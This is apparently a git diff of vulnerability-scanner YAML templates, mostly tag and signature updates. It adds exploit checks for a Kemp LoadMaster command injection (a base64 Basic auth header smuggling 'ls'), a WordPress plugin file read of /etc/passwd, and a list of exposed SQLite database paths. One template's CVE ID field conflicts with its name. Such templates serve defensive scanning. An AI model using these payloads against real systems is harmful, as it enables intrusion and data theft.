words:
- "autodesk-domain-verification"
- type: word
name: "stripe"
words:
- "stripe-verification"
- type: word
name: "atlassian"
words:
- "atlassian-domain-verification"
- type: word
name: "adobe-sign"
words:
- "adobe-sign-verification"
- type: word
name: "zoho"
words:
- "zoho-verification"
- type: word
name: "have-i-been-pwned"
words:
- "have-i-been-pwned-verification"
- type: word
name: "knowbe4"
words:
- "knowbe4-site-verification"
- type: word
name: "jamf"
words:
- "jamf-site-verification"
- type: word
name: "parallels"
words:
- "parallels-domain-verification"
- type: word
name: "dropbox"
words:
- "dropbox-domain-verification"
- type: word
name: "vmware-cloud"
words:
- "vmware-cloud-verification"
- type: word
name: "canva"
words:
- "canva-site-verification"
- type: word
name: "mongodb"
words:
- "mongodb-site-verification"
- type: word
name: "slack"
words:
- "slack-domain-verification"
- type: word
name: "teamViewer"
words:
- "teamviewer-sso-verification"
- type: word
name: "bugcrowd"
words:
- "bugcrowd-verification"
- type: word
name: "cisco"
words:
- "cisco-site-verification"
- type: word
name: "palo-alto-networks"
words:
- "paloaltonetworks-site-verification"
- type: word
name: "twilio"
words:
- "twilio-domain-verification"
- type: word
name: "dell-technologies"
words:
- "dell-technologies-domain-verification"
- type: word
name: "1password"
words:
- "1password-site-verification"
- type: word
name: "duo"
words:
- "duo_sso_verification"
- type: word
name: "sophos"
words:
- "sophos-domain-verification"
- type: word
name: "pinterest"
words:
- "pinterest-site-verification"
- type: word
name: "citrix"
words:
- "citrix-verification-code"
- type: word
name: "zapier"
words:
- "zapier-domain-verification-challenge"
- type: word
name: "uber"
words:
- "uber-domain-verification"
- type: word
name: "zoom"
words:
- "zoom-domain-verification"
- type: word
name: "lastpass"
words:
- "lastpass-verification-code"
- type: word
name: "google-workspace"
words:
- "google-site-verification"
- type: word
name: "flexera"
words:
- "flexera-domain-verification"
- type: word
name: "yandex"
words:
- "yandex-verification"
- type: word
name: "calendly"
words:
- "calendly-site-verification"
- type: word
name: "docusign"
words:
- "docusign"
- type: word
name: "whimsical"
words:
- "whimsical"
# digest: 490a00463044022043132b95ad11ec72665418855d60e0d979abbe9957b18f9170981f4f4af22a72022054d2942e7554851cd1f043f99d5e119ff9e8943a635a891927b1897d270383b9:922c64590222798bb761d5b6d8e72950

View File

@ -27,7 +27,7 @@ info:
max-request: 1
vendor: mysqldumper
product: mysqldumper
tags: cve2012,cve,packetstorm,lfi,edb,mysqldumper,xss
tags: cve2012,cve,packetstorm,lfi,edb,mysqldumper
http:
- method: GET
@ -43,4 +43,4 @@ http:
- type: status
status:
- 200
# digest: 4b0a00483046022100eefa80b385734b0a1e6f33288900b62b779941de6560c529987c9593f998d354022100a78e22cf092547bdbd7693f37f2f5fe8f9d4858b98c6fcfc32c3cf37b6f96274:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100de6cb5ae696eb8f0b8837ff02b5e53e8049e806e0253c9933027f7da28634071022100fc1518b608713661374a7f1ebd5ef01b8816925196928a73aa3882adf5bf8192:922c64590222798bb761d5b6d8e72950

View File

@ -28,7 +28,7 @@ info:
max-request: 65
vendor: embedthis
product: goahead
tags: cve,cve2017,rce,goahead,bruteforce,kev,vulhub,embedthis
tags: cve,cve2017,rce,goahead,fuzz,kev,vulhub,embedthis
http:
- raw:
@ -117,4 +117,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a00473045022100dec8b43170cf34ed98fbf83c8dc09389ffefda9fd823a123f509f32dbb63cc570220638e59f0bec3b3ab5a49d51408722e58ca5276e415dfaa2cb4821b2c65b295ac:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220121da3e7b07d35d6cc36396744f512a33ad3dc1ba36b7f99975e68d99f7950e50220073fc66cac1e0ba2aba9a53106e851591967dd64abdeb8b4d199284261e0417d:922c64590222798bb761d5b6d8e72950

View File

@ -27,7 +27,7 @@ info:
max-request: 100
vendor: zabbix
product: zabbix
tags: cve2019,cve,bruteforce,auth-bypass,login,edb,zabbix
tags: cve2019,cve,fuzz,auth-bypass,login,edb,zabbix
http:
- raw:
@ -48,4 +48,4 @@ http:
- type: status
status:
- 200
# digest: 490a004630440220626b2ab1255806a015af4a5a877b4cc26870eaa35262c5980d85b262263b2bad022029a7a7154e81df1a32ffc290eadfb2dfe71fd5c7dc9fbadbf4bc92c421ea6a48:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402206e060526ed498e58aeb165e1a86c6dfb0f822270df28b1f37de9879abeb9453502205623412e5aa23b5444d28233dc3a09dd053b5d8c1d4138adc4bd5cf524207012:922c64590222798bb761d5b6d8e72950

View File

@ -28,7 +28,7 @@ info:
vendor: automattic
product: sensei_lms
framework: wordpress
tags: cve,cve2022,wp,disclosure,wpscan,sensei-lms,bruteforce,hackerone,wordpress,wp-plugin,automattic
tags: cve,cve2022,wp,disclosure,wpscan,sensei-lms,fuzz,hackerone,wordpress,wp-plugin,automattic
http:
- method: GET
@ -56,4 +56,4 @@ http:
- type: status
status:
- 200
# digest: 490a0046304402207c51a21553085f96246b9b7a7b8fcb17455c8ede92140fc56ac74b94c60b3fcf022054295c2dbda0cd3975caa9c8ac89cd1d99b8f237e8fe3258e096d29e53f99f61:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220495ab4eeb68248ce94758f27eab64434c32477db41d51efff29e248a0bee54a102204decc78a0d04e9931c1440579656391f3cd9c5e45d86f0b672c44c99bc942d72:922c64590222798bb761d5b6d8e72950

View File

@ -29,7 +29,7 @@ info:
vendor: anti-malware_security_and_brute-force_firewall_project
product: anti-malware_security_and_brute-force_firewall
framework: wordpress
tags: cve,cve2022,wordpress,wp-plugin,xss,gotmls,authenticated,wpscan,anti-malware_security_and_brute-force_firewall_project
tags: cve,cve2022,wordpress,wp-plugin,xss,gotmls,authenticated,wpscan
http:
- raw:
@ -60,4 +60,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a00473045022100eef0f765c6118556853d7fbe2dacb78f2e80b4b820d56e883878df1688544eb402205baf46c82ff1df66387173dd365185b8a1517ac070ededd1288d324488f2b15a:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022059cd96c86ae45ea4aa0ae09c6c3740e9225be1edfbafa84a38473cad7830094d022100e1627acd2f09e5f64cb1285bd45bad4f3b7d95657dff74b6310bbcfdcf01c8c5:922c64590222798bb761d5b6d8e72950

View File

@ -28,7 +28,7 @@ info:
vendor: citrix
product: sharefile_storage_zones_controller
shodan-query: title:"ShareFile Storage Server"
tags: cve2023,cve,sharefile,rce,intrusive,fileupload,bruteforce,kev,citrix
tags: cve2023,cve,sharefile,rce,intrusive,fileupload,fuzz,kev,citrix
variables:
fileName: '{{rand_base(8)}}'
@ -60,4 +60,4 @@ http:
- type: dsl
dsl:
- 'BaseURL+ "/cifs/" + fileName + ".aspx"'
# digest: 4a0a00473045022100d934886760e9ccd26b8fc8bb22de25e8dd46427d5b1b2c0773a84cba9646446002206093910f6613687b25b29229ba4f688d9a5721012f2691c8079cdcc61a203332:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402205da7cab8d8af553734b5f1c9203e90944a89fecdb12b73130bd97a508abf49bb022024325216beeb52a5e651a6cc678fc4dfa622158a1a0535f6464bb780be2f111a:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,47 @@
id: CVE-2024-1212
info:
name: Progress Kemp LoadMaster - Command Injection
author: DhiyaneshDK
severity: critical
description: |
Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.
reference:
- https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster
- https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212
- https://support.kemptechnologies.com/hc/en-us/articles/24325072850573-Release-Notice-LMOS-7-2-59-2-7-2-54-8-7-2-48-10-CVE-2024-1212
- https://nvd.nist.gov/vuln/detail/CVE-2024-1212
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2024-1212
cwe-id: CWE-78
epss-score: 0.00046
epss-percentile: 0.13478
metadata:
verified: true
max-request: 1
shodan-query: html:"LoadMaster"
tags: cve,cve2024,progress,rce,loadmaster
http:
- method: GET
path:
- "{{BaseURL}}/access/set?param=enableapi&value=1"
headers:
Authorization: "Basic JztsczsnOmRvZXNub3RtYXR0ZXI="
matchers-condition: and
matchers:
- type: word
part: body
words:
- "bin"
- "mnt"
- "WWW-Authenticate: Basic"
condition: and
- type: status
status:
- 200
# digest: 4a0a004730450220557f3f2f5ab7b8e23925a9acc4979743940842b4936843aaae68876e24ed24a4022100f067f077e0dae8b1aa1264efb248349fdd7e6f95341ca06cbab9c183402f4e99:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,38 @@
id: CVE-2024-27954
info:
name: WordPress Automatic Plugin <3.92.1 - Arbitrary File Download and SSRF
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
WordPress Automatic plugin <3.92.1 is vulnerable to unauthenticated Arbitrary File Download and SSRF Located in the downloader.php file, could permit attackers to download any file from a site. Sensitive data, including login credentials and backup files, could fall into the wrong hands. This vulnerability has been patched in version 3.92.1.
reference:
- https://wpscan.com/vulnerability/53b97401-1352-477b-a69a-680b01ef7266/
- https://securityonline.info/40000-sites-exposed-wordpress-plugin-update-critical-cve-2024-27956-cve-2024-27954/#google_vignette
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27954
classification:
cvss-score: 9.8
cwe-id: CWE-918
cve-id: CVE-2022-1970
metadata:
max-request: 1
verified: true
publicwww-query: "/wp-content/plugins/wp-automatic"
tags: cve,cve2024,wp,wordpress,wp-plugin,lfi,ssrf,wp-automatic
http:
- method: GET
path:
- "{{BaseURL}}/?p=3232&wp_automatic=download&link=file:///etc/passwd"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"link":"file:'
- type: regex
regex:
- "root:.*:0:0:"
# digest: 4a0a00473045022100fe0fefeeca090cd190ad427541a138e93717d0eac2f27c00a2eec4bf5a63e30902202c2a3213ac5e28f8244ed547d1dd868bc948638e4cddaacee81de6d2f9422da1:922c64590222798bb761d5b6d8e72950

View File

@ -13,7 +13,7 @@ info:
cwe-id: CWE-522
metadata:
max-request: 1
tags: alibaba,default-login
tags: canal,alibaba,default-login
http:
- raw:
@ -42,5 +42,4 @@ http:
words:
- 'data":{"token"'
- '"code":20000'
# digest: 4a0a004730450220126d880af62775003a5b6029ad39aead9272e2a61bdaab710e896acf665d7064022100caa03f9b85633bd64fce0925f23720ac678e539c93355165426ed68a982d820e:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100dcf09580a68dde8267efb45c71a519054938eaa0f8389934c19a69f945ecbd73022010071bf196c1b070ee79de3c48c4227e6834381e641b486b2059ace96d8257d7:922c64590222798bb761d5b6d8e72950

View File

@ -16,7 +16,7 @@ info:
verified: true
max-request: 200
shodan-query: title:"Oracle PeopleSoft Sign-in"
tags: default-login,peoplesoft,oracle,bruteforce
tags: default-login,peoplesoft,oracle,fuzz
http:
- method: POST
@ -82,4 +82,4 @@ http:
- type: status
status:
- 302
# digest: 490a00463044022050a7ba41878e766a7453e20f034e337465bb2c7e07eda9ce12ec916ed28df2d202205e97d0b986bb626f7127189fc4f889109ba9f20801a5a72cc406f9e6dcf5db4e:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022021caed0d7676a38577b2c3d3b6a6549f5bcb9942d4b96265587f639ae486006502203ec6b9e3cce73f65f0aaffe2ae6ea2835d44c5431bd579f08d3fe2450ccedb74:922c64590222798bb761d5b6d8e72950

View File

@ -19,7 +19,7 @@ info:
vendor: adminer
product: adminer
max-request: 741
tags: panel,bruteforce,adminer,login,sqli
tags: panel,fuzz,adminer,login,sqli
http:
- raw:
@ -53,4 +53,4 @@ http:
group: 1
regex:
- '<span class="version">([0-9.]+)'
# digest: 4a0a00473045022100ee20baf11aa5604db68aa1754dd077e912192bd19c3e3586c7442a697f6ac22102204c689729457b6f71c285dfe1309b72f23ba46b69516e80c2baaad9b20bd4b77a:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100d1fcc4e636bdb5f3961f4541594d60ac0dc86688a2cda52de2530fbf4ca9b770022100d68508fb2d73378f62f821365ccc2f11f063da2ae73ded7792159a9a1c97e373:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,29 @@
id: softether-vpn-panel
info:
name: SoftEther VPN Panel - Detect
author: bhutch
severity: info
description: |
SoftEther VPN panel was detected.
metadata:
max-request: 1
verified: true
shodan-query: http.title:"SoftEther VPN Server"
tags: panel,vpn,softether
http:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>SoftEther VPN Server</title>"
- type: status
status:
- 202

View File

@ -7,7 +7,7 @@ info:
description: PHP Source File is disclosed to external users.
metadata:
max-request: 1512
tags: exposure,backup,php,disclosure,bruteforce
tags: exposure,backup,php,disclosure,fuzz
http:
- method: GET
@ -136,4 +136,4 @@ http:
- "text/plain"
- "bytes"
condition: or
# digest: 4b0a00483046022100c733de0ef40feb46f3e0d6ba5996c622340ad6910a6ea85e9c1c4e8aa1939cd2022100b73afbe7b608bdd57d018fe31bdc23a620f2e6b965916193232c840782ef90d0:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022019ff7dd3ceced23dec05a238feaf346674305dde6a4a6613b965cf8d0500acfc02210092bbcbb84d7180e46714712507b6e6b108317250bc01d99b3d8eee50b2d7f393:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,155 @@
id: generic-db
info:
name: Generic Database File - Exposure
author: Michal Mikolas (nanuqcz)
severity: high
description: |
This is collection of some web frameworks recommendation or default configuration for SQLite database file location. If this file is publicly accessible due to server misconfiguration, it could result in application data leak including users sensitive data, password hashes etc.
reference:
- https://laravel.com/docs/11.x/database#sqlite-configuration # database/database.sqlite
- https://laravel.com/docs/5.2/database # database/database.sqlite
- https://github.com/laracasts/larabook/blob/master/app/config/database.php#L51 # app/database/production.sqlite
- https://forum.codeigniter.com/post-389846.html # writable/db.sqlite3
- https://github.com/codeigniter4projects/playground/blob/develop/.env.example#L33 # writable/database.db
- https://symfony.com/doc/current/doctrine.html#configuring-the-database # var/app.db
- https://symfony.com/doc/4.x/doctrine.html#configuring-the-database # var/app.db
- https://symfony.com/doc/3.x/doctrine.html # app/sqlite.db
- https://symfony.com/doc/2.x/doctrine.html # sqlite.db
- https://openclassrooms.com/forum/sujet/symfony3-sqlite-could-not-create-database # var/data/db.sqlite
- https://symfony.com/doc/current/reference/configuration/doctrine.html#doctrine-dbal-configuration # var/data/data.sqlite
- https://stackoverflow.com/questions/31762878/sqlite-3-database-with-django # db.sqlite3
- https://medium.com/@codewithbushra/using-sqlite-as-a-database-backend-in-django-projects-code-with-bushra-d23e3100686e # db.sqlite3
- https://gist.github.com/jwo/4512764?permalink_comment_id=2235763#gistcomment-2235763 # db/production.sqlite3
- https://stackoverflow.com/a/30345819/1632572 # db/production.sqlite3
- https://developerhowto.com/2018/12/29/build-a-rest-api-with-node-js-and-express-js/ # db.sqlite
- https://sqldocs.org/sqlite/sqlite-nodejs/ # mydb.sqlite
- https://stackoverflow.com/questions/41620788/error-database-connection-sqlite-is-missing-or-could-not-be-created-cakephp # app/data/app_db.sqlite
- https://stackoverflow.com/questions/2722383/using-sqlite3-with-cakephp # app/webroot/database.sqlite, app/database.sqlite
- https://levelup.gitconnected.com/how-to-connect-and-use-the-sqlite-database-in-codeigniter-3-48cd50d3e78d # application/databases/db.sqlite
- https://turmanauli.medium.com/how-to-connect-codeigniter-to-sqlite3-database-like-a-pro-2177497a6d30 # application/db/database.sqlite
- https://forum.codeigniter.com/thread-74522.html # application/Database/db1.db
- https://stackoverflow.com/a/37088960/1632572 # application/database/data.db
- https://docs.laminas.dev/tutorials/getting-started/database-and-models/ # data/*.db
- https://phalcon-nucleon.github.io/#!database/getting-started.html # storage/database/database.sqlite
- https://www.yiiframework.com/doc/blog/1.1/en/prototype.database # protected/data/*.db
- https://pusher.com/tutorials/rest-api-slim-part-1/ # db/database.db
- https://www.digitalocean.com/community/tutorials/how-to-use-the-fat-free-php-framework # db/database.sqlite
- https://doc.nette.org/en/database/configuration#toc-single-connection # app/Model/*.db
- https://www.sqlite.org/fileformat.html # SQLite file always starts with "SQLite format {sqlite_version}"
- https://en.wikipedia.org/wiki/List_of_file_signatures # SQLite binary signature: 53 51 4C 69 74 65 20 66 6F 72 6D 61 74 20
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
metadata:
max-request: 89
tags: files,database,exposure,sqlite,sqlite3,fuzz
http:
- method: GET
path:
- "{{BaseURL}}/{{path}}"
payloads:
path:
- database/database.sqlite
- database/production.db
- database/production.sqlite
- database/production.sqlite3
- app/database/production.sqlite
- writable/db.sqlite3
- writable/database.db
- var/app.db
- var/data/db.sqlite
- var/data/data.sqlite
- app/sqlite.db
- sqlite.db
- db.sqlite3
- db/production.sqlite3
- db.sqlite
- mydb.sqlite
- app/data/app_db.sqlite
- app/webroot/database.sqlite
- app/database.sqlite
- application/databases/db.sqlite
- application/db/database.sqlite
- application/Database/db1.db
- application/database/data.db
- data/app.db
- data/sqlite.db
- data/sqlite3.db
- data/database.db
- data/production.db
- storage/database/database.sqlite
- protected/data/app.db
- protected/data/sqlite.db
- protected/data/sqlite3.db
- protected/data/database.db
- protected/data/production.db
- db/database.db
- db/database.sqlite
- app/Model/app.db
- app/Model/sqlite.db
- app/Model/sqlite3.db
- app/Model/database.db
- app/Model/production.db
- app.db
- sqlite3.db
- app.sqlite
- app.sqlite3
- database.db
- database.sqlite
- database.sqlite3
- production.db
- production.sqlite
- production.sqlite3
- db/db.sqlite
- db/db.sqlite3
- db/sqlite.db
- db/sqlite3.db
- db/app.db
- db/app.sqlite
- db/app.sqlite3
- db/database.sqlite3
- db/production.db
- db/production.sqlite
- app/db.sqlite
- app/db.sqlite3
- app/sqlite3.db
- app/app.db
- app/app.sqlite
- app/app.sqlite3
- app/database.db
- app/database.sqlite3
- app/production.db
- app/production.sqlite
- app/production.sqlite3
- data/db.sqlite
- data/db.sqlite3
- data/app.sqlite
- data/app.sqlite3
- data/database.sqlite
- data/database.sqlite3
- data/production.sqlite
- data/production.sqlite3
- database/db.sqlite
- database/db.sqlite3
- database/sqlite.db
- database/sqlite3.db
- database/app.db
- database/app.sqlite
- database/app.sqlite3
- database/database.db
- database/database.sqlite3
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'startswith(body, "SQLite")' # SQLite file always starts with "SQLite format {sqlite_version}"
- 'contains(body, "CREATE TABLE")' # SQLite file usually contains "CREATE TABLE", meaning there is at least one table
- '!contains(body, "<html")'
- 'status_code == 200'
condition: and
# digest: 4a0a004730450220774c7ea36d2f6f3cb0c04baa3799540d2f306ccd5bd5c0fac8f19330142bac96022100f7919a4722b5363b5e4bffdb1785d7dbf746fe3dd261e089c46f206ac91e7f12:922c64590222798bb761d5b6d8e72950

View File

@ -34,4 +34,4 @@ http:
- 'contains(body_1, "{{randstr}}")'
- 'contains(body_2, "{{randstr}}")'
condition: and
# digest: 4b0a00483046022100bba6a80d36a07519a4f1b8528ccff3881319bdcd199c51e9d78c319e8832cac8022100f86715b3dbd1438e11a557d63175be67feddc557a7e0bbfcfa6c1b764a48aa0d:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100893d371d193cc0f4111cf8b61a2d092bf7820039aa9a6eecf49529c0d59ac41702201b80bdfb4007c9173b4cff9a55590cf605b0918021c8bbd96b3cc0294ecd5124:922c64590222798bb761d5b6d8e72950

View File

@ -39,4 +39,4 @@ http:
- type: regex
regex:
- "root:.*:0:0:"
# digest: 4a0a0047304502203dfb9d94713bdd57f01a1037a1a475e92c22c7f2917019840a194b6d93960fe5022100d2d94c46b98286546a9bd02fe1229a1fb36b8d4e40d0dd981d1ad31662ab0a3c:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022044f5c4ce901be80e947968eba35f25a3f9606a5cd8936480fd0cf89bde3edf4f022041fe2163a6b12dcb07d1e872f3051eb642e9b10dcf52f59d3e5a9a8107cf7434:922c64590222798bb761d5b6d8e72950

View File

@ -15,7 +15,7 @@ info:
cwe-id: CWE-200
metadata:
max-request: 4
tags: bruteforce,edb
tags: iis,edb
http:
- raw:
@ -44,4 +44,4 @@ http:
- type: dsl
dsl:
- "status_code_1!=404 && status_code_2 == 404 || status_code_3 != 404 && status_code_4 == 404"
# digest: 4b0a004830460221009bb41d08061c1ba58f9ba9d6da08c33ade50b3877f2e7aec5ecd20bb45a8b2f6022100e43b897605b6c1cb2720b460ebe592eceecec9662a9b51717e07568020ebcee2:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502207f1f208de9031454a3413b7b13977ee8f563be5c0ad83771de6897fa56a46c7f022100ab113072a9c2f91610fedd3a50cae51b16e01fca22b04c80bfdd675f86c0e45b:922c64590222798bb761d5b6d8e72950

View File

@ -45,4 +45,4 @@ http:
regex:
- "root:.*:0:0:"
part: body
# digest: 4a0a004730450220530a89eabafecafbf0a3de2f0ba62e33e25cefd85b20289a912eb5a15603ad51022100c63b246226590dd18a0c6e10508d8c5aed77d6ba23037197d980799866a876c1:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502210087a307489eb418f0906031bfc714587a7a63d61d3d748d51d61d33634454363502205b0a0800d1c4a85649d92cc90161e84a8539243c735643c99f74bc57483a3d77:922c64590222798bb761d5b6d8e72950

View File

@ -13,7 +13,7 @@ info:
cwe-id: CWE-200
metadata:
max-request: 341
tags: bruteforce,mdb,asp
tags: fuzz,mdb,asp
http:
- raw:
@ -44,4 +44,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a0047304502207843690e40ef53160e535662659535e27e49d4c23da29954cf7bae6db715b98c022100b90846e49879ba649cdd9e5bf68edd48a79c2d56641eaaa31d184f794a2e5d7f:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100a9c05c6a0c6579c0639a578b69157823126b4bc4badc33f4dcb52408d2fbd2960220798dd8340f94afec52275e40be3cdcf758b8a052afb2e0233aa34653cb33f22d:922c64590222798bb761d5b6d8e72950

View File

@ -41,4 +41,4 @@ http:
group: 2
regex:
- '<version>(<!\[CDATA\[)?([0-9.]+)'
# digest: 480a00453043021f14baaa0b076a2383aaab7e8b12ff5b1cc3a99adc343d2ec8387b72d652471402205dd96fa59febb8d09977684cc0944a47a5b5ae3a38a37643da069caebd330962:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022000c79d13083e771d6537a2043861c4ba6c2cb53693cde7fef5e1b20d86c52b070221009b43b0876fcac5d7ed73100bb4429edb23cbd9cd5e60bc1262ec97f501f2c9f4:922c64590222798bb761d5b6d8e72950

View File

@ -10,7 +10,7 @@ info:
- https://twitter.com/ImoJOnDz/status/1649089777629827072
metadata:
max-request: 9
tags: ssrf,proxy,oast,bruteforce
tags: ssrf,proxy,oast,fuzz
http:
- payloads:
@ -44,4 +44,4 @@ http:
- type: status
status:
- 200
# digest: 490a0046304402206be4527be73a1a8aaf704109373b9377f5e8bb8392a592501c5058465df0471902200f9adedf455a7f7693921716076874158203e3a0e5406f09455f406e26aeca7a:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100a67262dade744735b407460dddcbd5a203e9b5f727aa16b5c330df7272a6b861022038ed13f440b833327d52a233383b13bc6a9cd1ee7cf5bb2922c88e4b5c0a6960:922c64590222798bb761d5b6d8e72950

View File

@ -22,4 +22,4 @@ http:
part: header
words:
- "COMPASS"
# digest: 4a0a0047304502200edc0a5fa3514b05b3d4ce38fcbb898a89899c0fc3a18fabc6a34b166367782e022100d87c600c6cf948cfb36b407fec959e5497b49e343a13f571b4e7a2598b1979f1:922c64590222798bb761d5b6d8e72950
# digest: 4a0a004730450220173dd3ccec570c2d5733e4d455286748ff4709a84688d038c8fec9746546c45b022100cee1597a2837410bd6e0fd7635536ddac9a8d293c43439c064d07e3e618b4e7d:922c64590222798bb761d5b6d8e72950

View File

@ -791,4 +791,4 @@ http:
- '(?)content="CloudWAF"'
- 'Server: CloudWAF'
- 'Set-Cookie: HWWAFSESID='
# digest: 4a0a00473045022100cc858e9365b5bcfb441851a229e722ebcc673b7dcf0fe930bea0fe5d8954cf140220661071f8223b6b31c6bc77ce8f9643c077616a08ab412f211c1f2773341530a5:922c64590222798bb761d5b6d8e72950
# digest: 4a0a004730450220275dcc9d58d2ffaa091cd84f5b5ecb66c741d4fa2efa3de2b32dece8e7797fba022100d831918396c34900b70d06c6098b07c962117058264d35a02779d8a0be73ff58:922c64590222798bb761d5b6d8e72950

View File

@ -34,4 +34,4 @@ http:
regex:
- "===\\s(.*)\\s===" # extract the plugin name
- "(?m)Stable tag: ([0-9.]+)" # extract the plugin version
# digest: 4a0a00473045022011ffc9134eaa01b62eddcdbbc33af59e33613478dd206665d9f12d60ea4fe114022100a6845b777b51f0d3959d009a91f612b73b13c9a5dc6fe6d058bd37994d64fe6a:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502200e48b2e398c9ec8a1559e96019434ea839eb470a98d198af18a947332f02113f022100b17c8201e44fb304f1e57baa15a4e848388a42fbce942358454565d1658facb2:922c64590222798bb761d5b6d8e72950

View File

@ -26,4 +26,4 @@ http:
- type: word
words:
- "== Description =="
# digest: 490a0046304402205e9f7b61bf29869a2a1dc2da01f5bd8bbd23c0db195ed14cb6ad78d431cf7fa2022022903f13f5ee4a17cee2b1ed42eff80e29a72f3a0da7a463acc2e9121cbf1ed2:922c64590222798bb761d5b6d8e72950
# digest: 4a0a004730450220480caf586b5c260399e7e884b1e6c1e572a4bab84eae480feeb084868b38fa6702210092094fb5cb64bdfb9ff293289f131e98cb1dd8eb2d6a28cfa791db49afc7dac4:922c64590222798bb761d5b6d8e72950

View File

@ -14,7 +14,7 @@ info:
cwe-id: CWE-1391
metadata:
max-request: 276
tags: wordpress,default-login,bruteforce
tags: wordpress,default-login,fuzz
http:
- raw:
@ -45,4 +45,4 @@ http:
- type: status
status:
- 302
# digest: 4b0a004830460221008e46a934459d64782ed14afbd9e908a5cb090a14f0b0ac3a18d94aab84b1880b022100dc8c92494fac2b31cc1fe4a03635e9c39622cfdf0f552a5344cb759d3c6904d3:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402200c1408ee282f07a88d599b6e9e31b0bdb3d2e4fd0f027c30193d370a45b896ff022066ac3030dc876bd69dd867e59e9e985c250becbe504d1274ce392ae5436e1758:922c64590222798bb761d5b6d8e72950

View File

@ -32,4 +32,4 @@ http:
- "status_code_1 == 403 && status_code_2 != 403"
- "status_code_1 == 403 && status_code_3 != 403"
condition: or
# digest: 4a0a00473045022100ec5ba858cbe1e05e3174848d9069a308fe6fc8077ad9cb3e5be3ea5e8941e8ea02205590d97ee522844eceb4ac02f8368d35939a46b86594c2387cac974a52c6ae50:922c64590222798bb761d5b6d8e72950
# digest: 4b0a004830460221009c6175d4b394663b87da93b68f083bbdad28dce54149dfb1290a8d72f43f7a86022100e3c72e653388184addb6bb02348f7f214a0d29d5446b0bc87c4d026860c08b01:922c64590222798bb761d5b6d8e72950

View File

@ -16,7 +16,7 @@ info:
metadata:
verified: true
max-request: 85
tags: misc,defacement,spam,hacktivism,bruteforce
tags: misc,defacement,spam,hacktivism,fuzz
http:
- method: GET
@ -413,4 +413,4 @@ http:
- /frost.txt
- /-.txt
- /!.txt
# digest: 4b0a00483046022100f218ea0fd53ebf337b31b0b7ee9c3dbffec2b02ae4c275a4c933000c18056da2022100c7cfc9b6a0ac0b1ea92a4ae62cab623625d5710beecdf52408211b33d596c21c:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100a121574bdd704d284d1675f8721914e3c675e5c66a64c266753135d55836c43502206ab7dff5cb3dad67f1cb2e163b6c7d49d464498f2b1195d03bd3629a7a056f1f:922c64590222798bb761d5b6d8e72950

View File

@ -8,7 +8,7 @@ info:
- https://medium.com/swlh/internal-information-disclosure-using-hidden-ntlm-authentication-18de17675666
metadata:
max-request: 47
tags: miscellaneous,misc,bruteforce,windows
tags: miscellaneous,misc,fuzz,windows
http:
- raw:
@ -82,4 +82,4 @@ http:
- type: kval
kval:
- 'www_authenticate'
# digest: 490a0046304402200998332a900ab3a010afc671de86d7e0dce353842f87b01101f55fc8d3dfa8680220470194bf7c344099f16ae411b214e3f983275e7c5eb172f3d2fb448b8b16921a:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502205d7dadfbaf6f4fa5ee42494a2c579a1e1e673e8326c6524b66a397b17b38644002210099a781aec9fa8081e77aa23d7f6b6a14046ccd4ef8fd390b6376781f660d71ac:922c64590222798bb761d5b6d8e72950

View File

@ -8,7 +8,7 @@ info:
metadata:
max-request: 1
shodan-query: http.component:"Adobe Experience Manager"
tags: aem,bruteforce,misconfig
tags: aem,misconfig
http:
- method: GET
@ -32,4 +32,4 @@ http:
part: header
words:
- 'application/json'
# digest: 4b0a004830460221009f1fe9c087a47f4eaaa650529a28a4b5b4611e7feaf4501045633287cc9eb2af022100f9fb5b48056e18a956395b5cb8fd9231af85504f7816f4fd0c9b982bc1a52549:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100cafd612968a71e2c99dc57d80e19456e1651f3661fb078df3ffbf5c1e3527aa90221009d782891fce13e73a531815ef5c121a3afa614c8a49be98820317d8f01ff0adb:922c64590222798bb761d5b6d8e72950

View File

@ -9,7 +9,7 @@ info:
metadata:
max-request: 100
shodan-query: http.title:"GitLab"
tags: gitlab,enum,misconfig,bruteforce
tags: gitlab,enum,misconfig,fuzz
http:
- raw:
